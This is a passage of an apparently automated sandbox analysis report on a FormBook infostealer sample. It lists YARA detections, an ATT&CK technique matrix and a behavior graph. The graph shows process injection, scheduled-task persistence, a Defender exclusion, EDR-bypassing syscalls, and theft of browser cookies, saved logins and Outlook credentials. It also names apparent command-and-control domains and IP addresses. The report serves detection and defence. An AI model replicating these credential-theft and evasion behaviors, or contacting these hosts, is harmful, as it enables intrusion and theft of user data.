            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Users\user\AppData\Roaming\snTlRrBza.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\SearchIndexer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		612
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481954 Sample: JeouiaPf03mHSBH.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 61 www.sabhevillage.online 2->61 63 www.goodneighbor.club 2->63 65 5 other IPs or domains 2->65 79 Malicious sample detected (through community Yara rule) 2->79 81 Sigma detected: Scheduled temp file as task from temp location 2->81 83 Yara detected FormBook 2->83 85 6 other signatures 2->85 10 JeouiaPf03mHSBH.exe 7 2->10         started        14 snTlRrBza.exe 5 2->14         started        signatures3 process4 file5 53 C:\Users\user\AppData\Roaming\snTlRrBza.exe, PE32 10->53 dropped 55 C:\Users\...\snTlRrBza.exe:Zone.Identifier, ASCII 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmpA933.tmp, XML 10->57 dropped 59 C:\Users\user\...\JeouiaPf03mHSBH.exe.log, ASCII 10->59 dropped 99 Uses schtasks.exe or at.exe to add and modify task schedules 10->99 101 Writes to foreign memory regions 10->101 103 Allocates memory in foreign processes 10->103 105 Adds a directory exclusion to Windows Defender 10->105 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 schtasks.exe 1 10->21         started        107 Machine Learning detection for dropped file 14->107 109 Injects a PE file into a foreign processes 14->109 23 RegSvcs.exe 14->23         started        25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 16->73 29 qRurKwDVhn.exe 16->29 injected 75 Loading BitLocker PowerShell Module 19->75 31 WmiPrvSE.exe 19->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 qRurKwDVhn.exe 23->37 injected 40 conhost.exe 25->40         started        process9 signatures10 42 SearchIndexer.exe 13 29->42         started        87 Maps a DLL or memory area into another process 37->87 89 Found direct / indirect Syscall (likely to bypass EDR) 37->89 45 SearchIndexer.exe 37->45         started        process11 signatures12 91 Tries to steal Mail credentials (via file / registry access) 42->91 93 Tries to harvest and steal browser information (history, passwords, etc) 42->93 95 Modifies the context of a thread in another process (thread injection) 42->95 97 3 other signatures 42->97 47 qRurKwDVhn.exe 42->47 injected 51 firefox.exe 42->51         started        process13 dnsIp14 67 ancuapengiu28.com 172.96.191.69, 49745, 49746, 49747 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 47->67 69 www.lomos.top 162.254.38.5, 49753, 49754, 80 COGECO-PEER1CA United States 47->69 71 2 other IPs or domains 47->71 77 Found direct / indirect Syscall (likely to bypass EDR) 47->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.